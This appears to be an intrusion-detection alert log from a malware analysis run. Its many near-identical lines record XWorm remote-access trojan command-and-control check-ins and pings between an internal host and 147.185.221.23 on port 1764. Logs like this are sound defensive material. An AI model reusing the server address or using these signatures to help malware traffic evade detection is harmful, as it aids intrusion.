                                                                                        2024-10-13T19:11:11.640930+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.718992+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.718992+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.797336+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.797336+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.910741+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.910741+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.953559+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.953559+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.031591+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.031591+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.094001+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.094001+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.157104+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.157104+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.223051+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.223051+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.300355+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.300355+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.359751+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.359751+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.422311+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.422311+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.484775+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.484775+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.547495+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.547495+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.623567+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.623567+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.704505+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.704505+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.768184+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.768184+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.848456+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.848456+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.931827+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:12.931827+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.113164+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.113164+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.182061+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.182061+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.274264+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.274264+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.344200+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.344200+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.437898+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.437898+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.516273+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.516273+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.579682+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:13.579682+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:14.890089+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:14.939551+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:11:18.464123+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:18.464123+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:24.043968+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:24.045705+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:11:27.348191+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:27.348962+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:11:30.590024+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:35.950638+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:35.952108+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:11:36.606552+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:36.608276+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:11:47.676746+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:47.680864+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:11:48.477615+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:48.477615+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:54.378834+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550006TCP
                                                                                        2024-10-13T19:11:58.926948+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:59.162485+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.261133+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.261133+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.391540+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.391540+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.515542+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.515542+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.640594+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.640594+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.765543+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.765543+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.876150+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.876150+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.984396+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:11:59.984396+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.112129+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.112129+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.234808+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.234808+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.359237+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.359237+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.468663+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.468663+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.578019+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.578019+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.687691+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.687691+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.815588+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.815588+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.937477+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:00.937477+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.062882+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.062882+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.172093+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.172093+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.296950+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.296950+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.424126+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.424126+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.544110+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.544110+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.699152+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.699152+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.955401+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.955401+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:01.992633+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550012TCP
                                                                                        2024-10-13T19:12:02.078554+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.078554+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.190449+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.190449+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.299153+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.299153+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.416301+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.416301+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.531163+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.531163+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.658906+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.658906+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.781105+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.781105+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.907401+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:02.907401+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.015816+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.015816+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.125062+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.125062+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.238749+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.238749+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.359315+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.359315+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.470187+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.470187+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.578016+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.578016+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.687491+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.687491+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.798218+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.798218+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.906521+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:03.906521+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:04.015572+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:04.015572+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:04.137709+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:04.137709+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:04.249949+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:04.249949+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:04.717676+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:04.717676+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:04.921795+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:04.921795+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.031402+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.031402+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.140709+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.140709+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.250107+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.250107+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.360379+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.360379+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.484216+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.484216+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.593683+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.593683+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.719197+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.719197+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.845301+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.845301+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.982159+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:05.982159+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.109854+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.109854+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.235595+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
